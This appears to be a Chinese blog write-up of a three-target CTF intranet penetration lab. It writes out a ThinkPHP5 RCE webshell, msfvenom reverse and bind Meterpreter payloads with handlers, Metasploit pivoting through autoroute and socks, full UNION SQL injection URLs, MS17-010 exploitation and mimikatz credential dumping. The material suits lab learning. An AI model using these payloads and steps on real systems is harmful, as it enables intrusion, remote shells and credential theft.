记一次靶场内网渗透 |
您所在的位置:网站首页 › 校园网渗透实战 › 记一次靶场内网渗透 |
记一次靶场内网渗透
|
前记:本人刚学内网,会有一些菜,如有文章有错误地方,请各位师傅指出。没有本人同意请勿转载。 CFS-模拟大赛来源2019某CTF线下赛真题内网结合WEB攻防题库,涉及WEB攻击,内网代理路由等技术,每台服务器存在一个Flag,获取每一个Flag对应一个积分,获取三个Flag结尾。 前提配置:下面利用ifconfig来配置网卡的IP地址,当然这个地址是临时的地址,一旦重启网络服务或者重启网络系统就会失效的!! 格式:ifconfig ethx IP/MASK:配置某个网卡的ip地址 例如:设置eth0的IP地址为x.x.x.x,则就可以在命令行下直接键入:ifconfig eth0 192.168.22.22/24 虚拟机上创建vlan分配ip地址 注:我这里Target1地址是192.168.3.117,Target2地址是192.168.22.102 Target1上需要配置宝塔 账号eaj3yhsl 密码41bb8fee 1.这里得添加Target1的ip地址 Target2上需要配置宝塔 账号xdynr37d 密码123qwe… 1.这里得添加Target2的IP地址
探针目标-利用WEB漏洞(TP5_RCE)-获取webshell权限-获取Flag-Target2 前期信息搜集: 1.先利用kali自带的dirb来扫描网站目录,发现robots.txt找到一个flag 2.之后在访问Index.php 会发现网站是一个thinkphp框架 3.大胆的猜测一下这个网站有没有可能存在ThinkPHP5.x远程连接命令执行漏洞,一测试发现还真有直接命令执行上马 4.首先整出这个网站的绝对路径,这是方便写一句话木马 echo '' > /www/wwwroot/ThinkPHP/public/x.php4.1此时发现大马已经存在,直接菜刀连接大马 5.名为x.php密码为x的大马兄弟以上线
msf: 1.利用菜刀将生成后门放到Target1的主机上: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=kali本机地址 LPORT=1111 -f elf >t1.elf
2.kali上的msf设置监听模块以此来接收反弹: msfconsole use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST kali本机地址 set LPORT 1111 exploit background3.利用菜刀的虚拟终端运行木马 上传成功之后,运行木马,如果权限不够 chmod +777 t1.elf 增加权限 t1.elf 执行木马
4.接收到msf反弹 5.在上msf上添加22网段的路由 获取网络接口:run get_local_subnets 查看路由地址:run autoroute -p 添加路由地址:run autoroute -s 192.168.22.0/24
6.如果我们liunx没有对target利用特别好的工具,我们想用外网windows的工具就开启socks代理 开启本地代理: kali msf运行下面命令 use auxiliary/server/socks_proxy set srvport 1080 exploit
7.在windows上创建sock代理 8.设置msf创建的端口 9.测试联通性 10.然后在选择要代理的exe ,这里是选择软件所在的目录选择软件
11.由于我们要利用kali上面的工具,所以这里就要设置kali的代理,配置kali的proxychains4.conf,然后在最底下添加socks5 和ip端口
12.利用kali查找22网段的端口,最后会爆出22.102的网段80端口开启 其一: proxychains nmap -sT -Pn 192.168.22.0/24 -p80 -Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护。 -sT:扫描TCP数据包已建立的连接connect
其二方法: 利用msf中自带的端口扫描 use auxiliary/scanner/portscan/tcp set rhosts 192.168.22.0/24 set threads 100 run Target2:探针目标-利用WEB漏洞(SQL注入)-后台获取webshell权限-获取 Flag-Target3 http://192.168.22.102/index.php?r=vul&keyword=1 #sql注入 http://192.168.22.102/index.php?r=admini/public/login #后台 信息搜集: 1.我们通过nmap或者msf自带的端口扫描工具查找到192.168.22.102存在80端口也就是网页,之后再来访问网页来获取一些信息 2.没有见过的cms一般这里是直接扫网站目录,可以使用sockscap软件作为代理添加御剑或者别的扫描工具来扫描 3.扫描出他的后台,一般这里是测试登录框的注入点或者看源代码找接口未授权访问,这里都没有
4.他就比较狗,在主页里面的源代码中有一个提示 5.这个时候就要请出我们的超级sql工具!!!!!!!
流程: 1.在工具上添加socks5的代理 2.再来注入右击直接空白处选择生成数据包 3.使用他自己的识别注入 4.然后依次来获取库 表 列 数据 获取到的数据是个md5加密,之后去MD5加解密的网站上解密密码是123qwe 5.然后就利用账号密码来进入后台找上传点写个马,显然下一步的时候都会有一个flag 6.到后台的时候看到有这个模板就发现可以修改默认文件,啊 就算你不知道修改,你非要找个上传点,就得找这个上传设置给搞一下添加php后缀
7.朴实的渗透,写个马进去 8.用sockscap软件添加一个caidao的代理,然后一连 9.不要问我为什么要加?r=tag 因为我们在修改index.php的时候 是在tag的文件夹下面修改的 10.然后就起飞了,拿到target主机二的web权限,这里就跟target1一样了 弄一个正向连接kali的大马子 往这上面一传一执行,msf一上线,添加33网段,在一扫描网络,找他的服务器、端口,利用漏洞,啪的一下拿下,恩姆思路太清晰了 1.'报错 "正常 很明显 字符型注入 2.就一直’ order by 这样查有多列,会发现有到39无显示,到40有报错,就证明有39个表 %23是#的url编码过来的 3.在利用Union select 联合注入来找数据库,数据库名叫bagecms view-source:http://192.168.22.102/index.php?r=vul&keyword=1%27%20union%20select%20database(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
4.再来获取bagecms之后的所有表名 view-source:http://192.168.22.102/index.php?r=vul&keyword=1' union select group_concat(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from information_schema.tables where table_schema='bagecms' %23
5.再来查找bage_admin所有的列 view-source:http://192.168.22.102/index.php?r=vul&keyword=1' union select group_concat(column_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from information_schema.columns where table_name='bage_admin' %23
6.最后一步查找账号密码 view-source:http://192.168.22.102/index.php?r=vul&keyword=1' union select username,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from bagecms.bage_admin limit 0,1%23
这里解释一下为什么要整一个正向连接的后门,因为我们开始的3网段只有一个22网段的路由,没有33网段的路由,所以并不能连接到33网段的路由,记住此时我们已经拿到target2的web服务器,我们要将这个后门放到他的服务器上,执行这个后门来连接我们的msf,之后msf会反弹回targer2的权限,接下来就可以顺理成章的添加33网段路由 target31.生成正向后门: msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf
2.访问接受: kali上运行 use exploit/multi/handler set payload linux/x64/meterpreter/bind_tcp bind正向连接 set rhost 192.168.22.102 set LPORT 3333 exploitt2没有t1的3网段的地址,如果生成之前payload 绑定的3网段的木马 木马反向连接不上 所以这个时候需要生成正向连接后门 bind 2.1上传这个后门,在进行执行 2.2 msf接收到之后就开始老生常谈添加路由 3.信息收集及配置访问 获取网络接口:run get_local_subnets 查看路由地址:run autoroute -p 添加路由地址:run autoroute -s 192.168.33.0/24
4.之后在添加一个socks的代理,然后换个端口,因为我们的msf添加了33网段,所以kali可以通过kali–>target1–>target2–>查找target3的ip和端口 background use auxiliary/server/socks_proxy set srvport 1081 run
4.1 之后再Kali上面添加一个ip sudo vi /etc/proxychains4.conf
5.有了代理就可以探测存活主机了,发现了33.33一台存活主机 use auxiliary/scanner/portscan/tcp set rhosts 192.168.33.0/24 set threads 200 run
探针目标-端口及漏洞扫描-利用MS17010获取系统权限-获取Flag-GG 1.在通过nmap来扫描33.33存在的端口 proxychains nmap -Pn -sT -T4192.168.33.33 kali上扫描 1.2 最后有445和3389端口,这明显就是win7的机子,大胆一点猜猜是否有永恒之蓝漏洞 1.3 测试33.33的机子上是否存在永恒之蓝漏洞 use auxiliary/scanner/smb/smb_ms17_010 //判断漏洞 set rhosts 192.168.33.33 //设置ip地址 run 1.4 OK!很明显存在ms17010的漏洞 1.5 目标以确定开始攻击,啪的一下很快啊,就直接拿到system权限 use exploit/windows/smb/ms17_010_psexec //验证漏洞 set payload windows/meterpreter/bind_tcp //正向连接 set RHOSTS 192.168.33.33 //攻击目标 set RHOST 192.168.33.33 //连接目标 exploit
2.大声告诉我,到了这一步该干什么,该干黑客该干的一些事情 getsystem //获得system权限 load mimikatz //导入mimikatz creds_all //获取全部信息 2.1 获取到了账号密码,这还能干什么,进去干他! 2.2 利用kali来远程登录win7主机 2.3 嗯,机子很好,下次不需在用了 #总结: 1.这个靶场可以学习到如何一步步利用跳板代理横向到最深处网络。 2.Thinkphp5.x Rce漏洞利用,三种利用方式,以及echo写马的注意事项 3.MSF添加路由和socks代理,将Linux主机作为跳板从而横向移动 4.八哥CMS的漏洞利用Getshell,sql注入–>后台管理登陆,后台模板Getshell 5.Ms17-010的psexec利用模块的使用 6.典型的三层网络环境,通过利用MSF强大的路由功能,不断添加路由+socks代理,横向移动到最后一层网络 7.SocksCap64小红帽软件代理工具的使用 |
【本文地址】